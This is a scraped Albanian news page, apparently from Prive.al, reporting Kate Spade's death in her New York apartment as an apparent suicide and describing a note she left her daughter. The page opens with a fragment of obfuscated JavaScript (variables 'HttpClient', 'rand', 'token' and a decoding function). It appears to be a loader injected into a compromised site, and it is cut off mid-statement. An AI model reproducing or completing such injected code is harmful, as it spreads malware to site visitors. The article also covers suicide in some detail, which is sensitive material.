;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Gjendet e vdekur dizajnerja e njohur, zbulohet letra që i la vajzës

By

Mëngjesin e kësaj të marte, Kate Spade është gjetur e vdekur në apartamentin e saj në New York, në moshën 55-vjeçare.

Policia po heton rastin e saj si një vetëvrasje të dukshme.

 “55-vjecarja u gjet pa ndjenja në banesën e saj Park Avenue në orën 10:20 nga pastruesja e saj”, njoftoi një zyrtar i zbatimit të ligjit.

Thuhet se e ndjera la një letër për vajzën e saj.

Mesazhi i shkruar që më pas u zbulua, thotë se vdekja nuk ishte faji i 13-vjeçares, Frances Beatrix Spade, thanë burimet.

Kate Spade ishte e mirënjohur si stiliste e rrobave, këpucëve dhe stolive.

Ajo bashkë-themeloi Kate Spade Handbags në vitin 1993 dhe kompania tani ka qindra degë në mbarë botën./Prive.al

Artikuj të ngjashëm